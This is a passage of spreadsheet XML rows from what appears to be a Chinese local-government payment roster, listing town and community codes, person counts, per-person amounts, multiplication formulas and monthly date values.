      <c r="D1040" s="14" t="s">
        <v>2756</v>
      </c>
      <c r="E1040" s="14" t="s">
        <v>232</v>
      </c>
      <c r="F1040" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1040" s="14">
        <v>2</v>
      </c>
      <c r="H1040" s="14">
        <v>300</v>
      </c>
      <c r="I1040" s="14">
        <f>H1040*G1040</f>
        <v>600</v>
      </c>
      <c r="J1040" s="24">
        <v>45108</v>
      </c>
      <c r="K1040" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1041" ht="23" customHeight="1" spans="1:11">
      <c r="A1041" s="13" t="s">
        <v>2757</v>
      </c>
      <c r="B1041" s="14" t="str">
        <f>B1040</f>
        <v>城关镇</v>
      </c>
      <c r="C1041" s="14" t="str">
        <f>C1040</f>
        <v>中华社区</v>
      </c>
      <c r="D1041" s="18" t="s">
        <v>2758</v>
      </c>
      <c r="E1041" s="18" t="s">
        <v>2759</v>
      </c>
      <c r="F1041" s="14" t="str">
        <f>F1040</f>
        <v>4113210108</v>
      </c>
      <c r="G1041" s="14"/>
      <c r="H1041" s="14"/>
      <c r="I1041" s="14"/>
      <c r="J1041" s="24"/>
      <c r="K1041" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1042" ht="23" customHeight="1" spans="1:11">
      <c r="A1042" s="13" t="s">
        <v>2760</v>
      </c>
      <c r="B1042" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1042" s="14" t="s">
        <v>2074</v>
      </c>
      <c r="D1042" s="14" t="s">
        <v>2761</v>
      </c>
      <c r="E1042" s="14" t="s">
        <v>779</v>
      </c>
      <c r="F1042" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1042" s="14">
        <v>1</v>
      </c>
      <c r="H1042" s="14">
        <v>340</v>
      </c>
      <c r="I1042" s="14">
        <f>H1042*G1042</f>
        <v>340</v>
      </c>
      <c r="J1042" s="24">
        <v>45108</v>
      </c>
      <c r="K1042" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1043" ht="23" customHeight="1" spans="1:11">
      <c r="A1043" s="13" t="s">
        <v>2762</v>
      </c>
      <c r="B1043" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1043" s="14" t="s">
        <v>2082</v>
      </c>
      <c r="D1043" s="14" t="s">
        <v>2763</v>
      </c>
      <c r="E1043" s="14" t="s">
        <v>273</v>
      </c>
      <c r="F1043" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G1043" s="14">
        <v>1</v>
      </c>
      <c r="H1043" s="14">
        <v>340</v>
      </c>
      <c r="I1043" s="14">
        <f>H1043*G1043</f>
        <v>340</v>
      </c>
      <c r="J1043" s="24">
        <v>45108</v>
      </c>
      <c r="K1043" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1044" ht="23" customHeight="1" spans="1:11">
      <c r="A1044" s="13" t="s">
        <v>2764</v>
      </c>
      <c r="B1044" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1044" s="14" t="s">
        <v>2071</v>
      </c>
      <c r="D1044" s="14" t="s">
        <v>2765</v>
      </c>
      <c r="E1044" s="14" t="s">
        <v>1574</v>
      </c>
      <c r="F1044" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G1044" s="14">
        <v>2</v>
      </c>
      <c r="H1044" s="14">
        <v>300</v>
      </c>
      <c r="I1044" s="14">
        <f>H1044*G1044</f>
        <v>600</v>
      </c>
      <c r="J1044" s="24">
        <v>45108</v>
      </c>
      <c r="K1044" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1045" ht="23" customHeight="1" spans="1:11">
      <c r="A1045" s="13" t="s">
        <v>2766</v>
      </c>
      <c r="B1045" s="14" t="str">
        <f>B1044</f>
        <v>城关镇</v>
      </c>
      <c r="C1045" s="14" t="str">
        <f>C1044</f>
        <v>西北社区</v>
      </c>
      <c r="D1045" s="18" t="s">
        <v>2767</v>
      </c>
      <c r="E1045" s="18" t="s">
        <v>2768</v>
      </c>
      <c r="F1045" s="14" t="str">
        <f>F1044</f>
        <v>4113210106</v>
      </c>
      <c r="G1045" s="14"/>
      <c r="H1045" s="14"/>
      <c r="I1045" s="14"/>
      <c r="J1045" s="14"/>
      <c r="K1045" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1046" ht="23" customHeight="1" spans="1:11">
      <c r="A1046" s="13" t="s">
        <v>2769</v>
      </c>
      <c r="B1046" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1046" s="14" t="s">
        <v>2082</v>
      </c>
      <c r="D1046" s="14" t="s">
        <v>2770</v>
      </c>
      <c r="E1046" s="14" t="s">
        <v>1093</v>
      </c>
      <c r="F1046" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G1046" s="14">
        <v>1</v>
      </c>
      <c r="H1046" s="14">
        <v>340</v>
      </c>
      <c r="I1046" s="14">
        <f t="shared" ref="I1046:I1054" si="50">H1046*G1046</f>
        <v>340</v>
      </c>
      <c r="J1046" s="14">
        <v>45139</v>
      </c>
      <c r="K1046" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1047" ht="23" customHeight="1" spans="1:11">
      <c r="A1047" s="13" t="s">
        <v>2771</v>
      </c>
      <c r="B1047" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1047" s="14" t="s">
        <v>2082</v>
      </c>
      <c r="D1047" s="14" t="s">
        <v>2772</v>
      </c>
      <c r="E1047" s="14" t="s">
        <v>933</v>
      </c>
      <c r="F1047" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G1047" s="14">
        <v>1</v>
      </c>
      <c r="H1047" s="14">
        <v>340</v>
      </c>
      <c r="I1047" s="14">
        <f t="shared" si="50"/>
        <v>340</v>
      </c>
      <c r="J1047" s="14">
        <v>45139</v>
      </c>
      <c r="K1047" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1048" ht="23" customHeight="1" spans="1:11">
      <c r="A1048" s="13" t="s">
        <v>2773</v>
      </c>
      <c r="B1048" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1048" s="14" t="s">
        <v>2077</v>
      </c>
      <c r="D1048" s="14" t="s">
        <v>2774</v>
      </c>
      <c r="E1048" s="14" t="s">
        <v>239</v>
      </c>
      <c r="F1048" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G1048" s="14">
        <v>1</v>
      </c>
      <c r="H1048" s="14">
        <v>340</v>
      </c>
      <c r="I1048" s="14">
        <f t="shared" si="50"/>
        <v>340</v>
      </c>
      <c r="J1048" s="14">
        <v>45139</v>
      </c>
      <c r="K1048" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1049" ht="23" customHeight="1" spans="1:11">
      <c r="A1049" s="13" t="s">
        <v>2775</v>
      </c>
      <c r="B1049" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1049" s="14" t="s">
        <v>2077</v>
      </c>
      <c r="D1049" s="14" t="s">
        <v>2776</v>
      </c>
      <c r="E1049" s="14" t="s">
        <v>288</v>
      </c>
      <c r="F1049" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G1049" s="14">
        <v>1</v>
      </c>
      <c r="H1049" s="14">
        <v>340</v>
      </c>
      <c r="I1049" s="14">
        <f t="shared" si="50"/>
        <v>340</v>
      </c>
      <c r="J1049" s="14">
        <v>45139</v>
      </c>
      <c r="K1049" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1050" ht="23" customHeight="1" spans="1:11">
      <c r="A1050" s="13" t="s">
        <v>2777</v>
      </c>
      <c r="B1050" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1050" s="14" t="s">
        <v>2778</v>
      </c>
      <c r="D1050" s="14" t="s">
        <v>2779</v>
      </c>
      <c r="E1050" s="14" t="s">
        <v>2780</v>
      </c>
      <c r="F1050" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1050" s="14">
        <v>1</v>
      </c>
      <c r="H1050" s="14">
        <v>340</v>
      </c>
      <c r="I1050" s="14">
        <f t="shared" si="50"/>
        <v>340</v>
      </c>
      <c r="J1050" s="14">
        <v>45139</v>
      </c>
      <c r="K1050" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1051" ht="23" customHeight="1" spans="1:11">
      <c r="A1051" s="13" t="s">
        <v>2781</v>
      </c>
      <c r="B1051" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1051" s="14" t="s">
        <v>2782</v>
      </c>
      <c r="D1051" s="14" t="s">
        <v>2783</v>
      </c>
      <c r="E1051" s="14" t="s">
        <v>331</v>
      </c>
      <c r="F1051" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1051" s="14">
        <v>1</v>
      </c>
      <c r="H1051" s="14">
        <v>340</v>
      </c>
      <c r="I1051" s="14">
        <f t="shared" si="50"/>
        <v>340</v>
      </c>
      <c r="J1051" s="14">
        <v>45139</v>
      </c>
      <c r="K1051" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1052" ht="23" customHeight="1" spans="1:11">
      <c r="A1052" s="13" t="s">
        <v>2784</v>
      </c>
      <c r="B1052" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1052" s="14" t="s">
        <v>2785</v>
      </c>
      <c r="D1052" s="14" t="s">
        <v>2786</v>
      </c>
      <c r="E1052" s="14" t="s">
        <v>2787</v>
      </c>
      <c r="F1052" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1052" s="14">
        <v>1</v>
      </c>
      <c r="H1052" s="14">
        <v>340</v>
      </c>
      <c r="I1052" s="14">
        <f t="shared" si="50"/>
        <v>340</v>
      </c>
      <c r="J1052" s="14">
        <v>45139</v>
      </c>
      <c r="K1052" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1053" ht="23" customHeight="1" spans="1:11">
      <c r="A1053" s="13" t="s">
        <v>2788</v>
      </c>
      <c r="B1053" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1053" s="14" t="s">
        <v>2789</v>
      </c>
      <c r="D1053" s="14" t="s">
        <v>2790</v>
      </c>
      <c r="E1053" s="14" t="s">
        <v>569</v>
      </c>
      <c r="F1053" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1053" s="14">
        <v>1</v>
      </c>
      <c r="H1053" s="14">
        <v>340</v>
      </c>
      <c r="I1053" s="14">
        <f t="shared" si="50"/>
        <v>340</v>
      </c>
      <c r="J1053" s="14">
        <v>45139</v>
      </c>
      <c r="K1053" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1054" ht="23" customHeight="1" spans="1:11">
      <c r="A1054" s="13" t="s">
        <v>2791</v>
      </c>
      <c r="B1054" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1054" s="14" t="s">
        <v>2792</v>
      </c>
      <c r="D1054" s="14" t="s">
        <v>2793</v>
      </c>
      <c r="E1054" s="14" t="s">
        <v>320</v>
      </c>
      <c r="F1054" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1054" s="14">
        <v>3</v>
      </c>
      <c r="H1054" s="14">
        <v>265</v>
      </c>
      <c r="I1054" s="14">
        <f t="shared" si="50"/>
        <v>795</v>
      </c>
      <c r="J1054" s="14">
        <v>45139</v>
      </c>
      <c r="K1054" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1055" ht="23" customHeight="1" spans="1:11">
      <c r="A1055" s="13" t="s">
        <v>2794</v>
      </c>
      <c r="B1055" s="14" t="str">
        <f>B1054</f>
        <v>城关镇</v>
      </c>
      <c r="C1055" s="14" t="str">
        <f>C1054</f>
        <v>税务局中华办理</v>
      </c>
      <c r="D1055" s="15" t="s">
        <v>2795</v>
      </c>
      <c r="E1055" s="15" t="s">
        <v>1702</v>
      </c>
      <c r="F1055" s="14" t="str">
        <f>F1054</f>
        <v>4113210108</v>
      </c>
      <c r="G1055" s="14"/>
      <c r="H1055" s="14"/>
      <c r="I1055" s="14"/>
      <c r="J1055" s="14"/>
      <c r="K1055" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1056" ht="23" customHeight="1" spans="1:11">
      <c r="A1056" s="13" t="s">
        <v>2796</v>
      </c>
      <c r="B1056" s="14" t="str">
        <f>B1055</f>
        <v>城关镇</v>
      </c>
      <c r="C1056" s="14" t="str">
        <f>C1055</f>
        <v>税务局中华办理</v>
      </c>
      <c r="D1056" s="15" t="s">
        <v>2797</v>
      </c>
      <c r="E1056" s="15" t="s">
        <v>607</v>
      </c>
      <c r="F1056" s="14" t="str">
        <f>F1055</f>
        <v>4113210108</v>
      </c>
      <c r="G1056" s="14"/>
      <c r="H1056" s="14"/>
      <c r="I1056" s="14"/>
      <c r="J1056" s="14"/>
      <c r="K1056" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1057" ht="23" customHeight="1" spans="1:11">
      <c r="A1057" s="13" t="s">
        <v>2798</v>
      </c>
      <c r="B1057" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1057" s="14" t="s">
        <v>2799</v>
      </c>
      <c r="D1057" s="14" t="s">
        <v>2800</v>
      </c>
      <c r="E1057" s="14" t="s">
        <v>340</v>
      </c>
      <c r="F1057" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1057" s="14">
        <v>1</v>
      </c>
      <c r="H1057" s="14">
        <v>340</v>
      </c>
      <c r="I1057" s="14">
        <f t="shared" ref="I1057:I1069" si="51">H1057*G1057</f>
        <v>340</v>
      </c>
      <c r="J1057" s="14">
        <v>45139</v>
      </c>
      <c r="K1057" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1058" ht="23" customHeight="1" spans="1:11">
      <c r="A1058" s="13" t="s">
        <v>2801</v>
      </c>
      <c r="B1058" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1058" s="14" t="s">
        <v>2802</v>
      </c>
      <c r="D1058" s="14" t="s">
        <v>2803</v>
      </c>
      <c r="E1058" s="14" t="s">
        <v>2804</v>
      </c>
      <c r="F1058" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1058" s="14">
        <v>1</v>
      </c>
      <c r="H1058" s="14">
        <v>340</v>
      </c>
      <c r="I1058" s="14">
        <f t="shared" si="51"/>
        <v>340</v>
      </c>
      <c r="J1058" s="14">
        <v>45139</v>
      </c>
      <c r="K1058" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1059" ht="23" customHeight="1" spans="1:11">
      <c r="A1059" s="13" t="s">
        <v>2805</v>
      </c>
      <c r="B1059" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1059" s="14" t="s">
        <v>2806</v>
      </c>
      <c r="D1059" s="14" t="s">
        <v>2807</v>
      </c>
      <c r="E1059" s="14" t="s">
        <v>502</v>
      </c>
      <c r="F1059" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1059" s="14">
        <v>1</v>
      </c>
      <c r="H1059" s="14">
        <v>340</v>
      </c>
      <c r="I1059" s="14">
        <f t="shared" si="51"/>
        <v>340</v>
      </c>
      <c r="J1059" s="14">
        <v>45139</v>
      </c>
      <c r="K1059" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1060" ht="23" customHeight="1" spans="1:11">
      <c r="A1060" s="13" t="s">
        <v>2808</v>
      </c>
      <c r="B1060" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1060" s="14" t="s">
        <v>2809</v>
      </c>
      <c r="D1060" s="14" t="s">
        <v>2810</v>
      </c>
      <c r="E1060" s="14" t="s">
        <v>779</v>
      </c>
      <c r="F1060" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1060" s="14">
        <v>1</v>
      </c>
      <c r="H1060" s="14">
        <v>340</v>
      </c>
      <c r="I1060" s="14">
        <f t="shared" si="51"/>
        <v>340</v>
      </c>
      <c r="J1060" s="14">
        <v>45139</v>
      </c>
      <c r="K1060" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1061" ht="23" customHeight="1" spans="1:11">
      <c r="A1061" s="13" t="s">
        <v>2811</v>
      </c>
      <c r="B1061" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1061" s="14" t="s">
        <v>2812</v>
      </c>
      <c r="D1061" s="14" t="s">
        <v>2813</v>
      </c>
      <c r="E1061" s="14" t="s">
        <v>1365</v>
      </c>
      <c r="F1061" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1061" s="14">
        <v>1</v>
      </c>
      <c r="H1061" s="14">
        <v>340</v>
      </c>
      <c r="I1061" s="14">
        <f t="shared" si="51"/>
        <v>340</v>
      </c>
      <c r="J1061" s="14">
        <v>45139</v>
      </c>
      <c r="K1061" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1062" ht="23" customHeight="1" spans="1:11">
      <c r="A1062" s="13" t="s">
        <v>2814</v>
      </c>
      <c r="B1062" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1062" s="14" t="s">
        <v>2815</v>
      </c>
      <c r="D1062" s="14" t="s">
        <v>2816</v>
      </c>
      <c r="E1062" s="14" t="s">
        <v>933</v>
      </c>
      <c r="F1062" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G1062" s="14">
        <v>1</v>
      </c>
      <c r="H1062" s="14">
        <v>340</v>
      </c>
      <c r="I1062" s="14">
        <f t="shared" si="51"/>
        <v>340</v>
      </c>
      <c r="J1062" s="14">
        <v>45139</v>
      </c>
      <c r="K1062" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1063" ht="23" customHeight="1" spans="1:11">
      <c r="A1063" s="13" t="s">
        <v>2817</v>
      </c>
      <c r="B1063" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1063" s="14" t="s">
        <v>2818</v>
      </c>
      <c r="D1063" s="14" t="s">
        <v>2819</v>
      </c>
      <c r="E1063" s="14" t="s">
        <v>222</v>
      </c>
      <c r="F1063" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G1063" s="14">
        <v>1</v>
      </c>
      <c r="H1063" s="14">
        <v>340</v>
      </c>
      <c r="I1063" s="14">
        <f t="shared" si="51"/>
        <v>340</v>
      </c>
      <c r="J1063" s="14">
        <v>45139</v>
      </c>
      <c r="K1063" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1064" ht="23" customHeight="1" spans="1:11">
      <c r="A1064" s="13" t="s">
        <v>2820</v>
      </c>
      <c r="B1064" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1064" s="14" t="s">
        <v>2818</v>
      </c>
      <c r="D1064" s="14" t="s">
        <v>2821</v>
      </c>
      <c r="E1064" s="14" t="s">
        <v>292</v>
      </c>
      <c r="F1064" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G1064" s="14">
        <v>1</v>
      </c>
      <c r="H1064" s="14">
        <v>340</v>
      </c>
      <c r="I1064" s="14">
        <f t="shared" si="51"/>
        <v>340</v>
      </c>
      <c r="J1064" s="14">
        <v>45139</v>
      </c>
      <c r="K1064" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1065" ht="23" customHeight="1" spans="1:11">
      <c r="A1065" s="13" t="s">
        <v>2822</v>
      </c>
      <c r="B1065" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1065" s="14" t="s">
        <v>2823</v>
      </c>
      <c r="D1065" s="14" t="s">
        <v>2824</v>
      </c>
      <c r="E1065" s="14" t="s">
        <v>323</v>
      </c>
      <c r="F1065" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G1065" s="14">
        <v>1</v>
      </c>
      <c r="H1065" s="14">
        <v>340</v>
      </c>
      <c r="I1065" s="14">
        <f t="shared" si="51"/>
        <v>340</v>
      </c>
      <c r="J1065" s="14">
        <v>45139</v>
      </c>
      <c r="K1065" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1066" ht="23" customHeight="1" spans="1:11">
      <c r="A1066" s="13" t="s">
        <v>2825</v>
      </c>
      <c r="B1066" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1066" s="14" t="s">
        <v>2826</v>
      </c>
      <c r="D1066" s="14" t="s">
        <v>2827</v>
      </c>
      <c r="E1066" s="14" t="s">
        <v>2828</v>
      </c>
      <c r="F1066" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G1066" s="14">
        <v>1</v>
      </c>
      <c r="H1066" s="14">
        <v>340</v>
      </c>
      <c r="I1066" s="14">
        <f t="shared" si="51"/>
        <v>340</v>
      </c>
      <c r="J1066" s="14">
        <v>45139</v>
      </c>
      <c r="K1066" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1067" ht="23" customHeight="1" spans="1:11">
      <c r="A1067" s="13" t="s">
        <v>2829</v>
      </c>
      <c r="B1067" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1067" s="14" t="s">
        <v>2830</v>
      </c>
      <c r="D1067" s="14" t="s">
        <v>2831</v>
      </c>
      <c r="E1067" s="14" t="s">
        <v>709</v>
      </c>
      <c r="F1067" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1067" s="14">
        <v>1</v>
      </c>
      <c r="H1067" s="14">
        <v>340</v>
      </c>
      <c r="I1067" s="14">
        <f t="shared" si="51"/>
        <v>340</v>
      </c>
      <c r="J1067" s="14">
        <v>45139</v>
      </c>
      <c r="K1067" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1068" ht="23" customHeight="1" spans="1:11">
      <c r="A1068" s="13" t="s">
        <v>2832</v>
      </c>
      <c r="B1068" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1068" s="14" t="s">
        <v>2833</v>
      </c>
      <c r="D1068" s="14" t="s">
        <v>2834</v>
      </c>
      <c r="E1068" s="14" t="s">
        <v>2835</v>
      </c>
      <c r="F1068" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1068" s="14">
        <v>1</v>
      </c>
      <c r="H1068" s="14">
        <v>340</v>
      </c>
      <c r="I1068" s="14">
        <f t="shared" si="51"/>
        <v>340</v>
      </c>
      <c r="J1068" s="14">
        <v>45139</v>
      </c>
      <c r="K1068" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1069" ht="23" customHeight="1" spans="1:11">
      <c r="A1069" s="13" t="s">
        <v>2836</v>
      </c>
      <c r="B1069" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1069" s="14" t="s">
        <v>2837</v>
      </c>
      <c r="D1069" s="14" t="s">
        <v>2838</v>
      </c>
      <c r="E1069" s="14" t="s">
        <v>933</v>
      </c>
      <c r="F1069" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1069" s="14">
        <v>2</v>
      </c>
      <c r="H1069" s="14">
        <v>300</v>
      </c>
      <c r="I1069" s="14">
        <f t="shared" si="51"/>
        <v>600</v>
      </c>
      <c r="J1069" s="14">
        <v>45139</v>
      </c>
      <c r="K1069" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1070" ht="23" customHeight="1" spans="1:11">
      <c r="A1070" s="13" t="s">
        <v>2839</v>
      </c>
      <c r="B1070" s="14" t="str">
        <f>B1069</f>
        <v>城关镇</v>
      </c>
      <c r="C1070" s="14" t="str">
        <f>C1069</f>
        <v>外贸局中华办理</v>
      </c>
      <c r="D1070" s="15" t="s">
        <v>2840</v>
      </c>
      <c r="E1070" s="15" t="s">
        <v>634</v>
      </c>
      <c r="F1070" s="14" t="str">
        <f>F1069</f>
        <v>4113210108</v>
      </c>
      <c r="G1070" s="14"/>
      <c r="H1070" s="14"/>
      <c r="I1070" s="14"/>
      <c r="J1070" s="14"/>
      <c r="K1070" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1071" ht="23" customHeight="1" spans="1:11">
      <c r="A1071" s="13" t="s">
        <v>2841</v>
      </c>
      <c r="B1071" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1071" s="14" t="s">
        <v>2842</v>
      </c>
      <c r="D1071" s="14" t="s">
        <v>2843</v>
      </c>
      <c r="E1071" s="14" t="s">
        <v>621</v>
      </c>
      <c r="F1071" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1071" s="14">
        <v>1</v>
      </c>
      <c r="H1071" s="14">
        <v>340</v>
      </c>
      <c r="I1071" s="14">
        <f t="shared" ref="I1071:I1079" si="52">H1071*G1071</f>
        <v>340</v>
      </c>
      <c r="J1071" s="14">
        <v>45139</v>
      </c>
      <c r="K1071" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1072" ht="23" customHeight="1" spans="1:11">
      <c r="A1072" s="13" t="s">
        <v>2844</v>
      </c>
      <c r="B1072" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1072" s="14" t="s">
        <v>2845</v>
      </c>
      <c r="D1072" s="14" t="s">
        <v>2846</v>
      </c>
      <c r="E1072" s="14" t="s">
        <v>1002</v>
      </c>
      <c r="F1072" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1072" s="14">
        <v>1</v>
      </c>
      <c r="H1072" s="14">
        <v>340</v>
      </c>
      <c r="I1072" s="14">
        <f t="shared" si="52"/>
        <v>340</v>
      </c>
      <c r="J1072" s="14">
        <v>45139</v>
      </c>
      <c r="K1072" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1073" ht="23" customHeight="1" spans="1:11">
      <c r="A1073" s="13" t="s">
        <v>2847</v>
      </c>
      <c r="B1073" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1073" s="14" t="s">
        <v>2848</v>
      </c>
      <c r="D1073" s="14" t="s">
        <v>2849</v>
      </c>
      <c r="E1073" s="14" t="s">
        <v>2850</v>
      </c>
      <c r="F1073" s="14" t="s">
        <v>2648</v>
      </c>
      <c r="G1073" s="14">
        <v>1</v>
      </c>
      <c r="H1073" s="14">
        <v>340</v>
      </c>
      <c r="I1073" s="14">
        <f t="shared" si="52"/>
        <v>340</v>
      </c>
      <c r="J1073" s="14">
        <v>45139</v>
      </c>
      <c r="K1073" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1074" ht="23" customHeight="1" spans="1:11">
      <c r="A1074" s="13" t="s">
        <v>2851</v>
      </c>
      <c r="B1074" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1074" s="14" t="s">
        <v>2852</v>
      </c>
      <c r="D1074" s="14" t="s">
        <v>2853</v>
      </c>
      <c r="E1074" s="14" t="s">
        <v>2854</v>
      </c>
      <c r="F1074" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1074" s="14">
        <v>1</v>
      </c>
      <c r="H1074" s="14">
        <v>340</v>
      </c>
      <c r="I1074" s="14">
        <f t="shared" si="52"/>
        <v>340</v>
      </c>
      <c r="J1074" s="14">
        <v>45139</v>
      </c>
      <c r="K1074" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1075" ht="23" customHeight="1" spans="1:11">
      <c r="A1075" s="13" t="s">
        <v>2855</v>
      </c>
      <c r="B1075" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1075" s="14" t="s">
        <v>2856</v>
      </c>
      <c r="D1075" s="14" t="s">
        <v>2857</v>
      </c>
      <c r="E1075" s="14" t="s">
        <v>2357</v>
      </c>
      <c r="F1075" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G1075" s="14">
        <v>1</v>
      </c>
      <c r="H1075" s="14">
        <v>340</v>
      </c>
      <c r="I1075" s="14">
        <f t="shared" si="52"/>
        <v>340</v>
      </c>
      <c r="J1075" s="14">
        <v>45139</v>
      </c>
      <c r="K1075" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1076" ht="23" customHeight="1" spans="1:11">
      <c r="A1076" s="13" t="s">
        <v>2858</v>
      </c>
      <c r="B1076" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1076" s="14" t="s">
        <v>2859</v>
      </c>
      <c r="D1076" s="14" t="s">
        <v>2860</v>
      </c>
      <c r="E1076" s="14" t="s">
        <v>2861</v>
      </c>
      <c r="F1076" s="14" t="s">
        <v>2009</v>
      </c>
      <c r="G1076" s="14">
        <v>1</v>
      </c>
      <c r="H1076" s="14">
        <v>340</v>
      </c>
      <c r="I1076" s="14">
        <f t="shared" si="52"/>
        <v>340</v>
      </c>
      <c r="J1076" s="14">
        <v>45139</v>
      </c>
      <c r="K1076" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1077" ht="23" customHeight="1" spans="1:11">
      <c r="A1077" s="13" t="s">
        <v>2862</v>
      </c>
      <c r="B1077" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1077" s="14" t="s">
        <v>2071</v>
      </c>
      <c r="D1077" s="14" t="s">
        <v>2863</v>
      </c>
      <c r="E1077" s="14" t="s">
        <v>292</v>
      </c>
      <c r="F1077" s="14">
        <v>4113210417</v>
      </c>
      <c r="G1077" s="14">
        <v>1</v>
      </c>
      <c r="H1077" s="14">
        <v>340</v>
      </c>
      <c r="I1077" s="14">
        <f t="shared" si="52"/>
        <v>340</v>
      </c>
      <c r="J1077" s="14">
        <v>45170</v>
      </c>
      <c r="K1077" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1078" ht="23" customHeight="1" spans="1:11">
      <c r="A1078" s="13" t="s">
        <v>2864</v>
      </c>
      <c r="B1078" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1078" s="14" t="s">
        <v>2071</v>
      </c>
      <c r="D1078" s="14" t="s">
        <v>2865</v>
      </c>
      <c r="E1078" s="14" t="s">
        <v>334</v>
      </c>
      <c r="F1078" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G1078" s="14">
        <v>1</v>
      </c>
      <c r="H1078" s="14">
        <v>340</v>
      </c>
      <c r="I1078" s="14">
        <f t="shared" si="52"/>
        <v>340</v>
      </c>
      <c r="J1078" s="14">
        <v>45170</v>
      </c>
      <c r="K1078" s="14" t="s">
        <v>225</v>
      </c>
    </row>
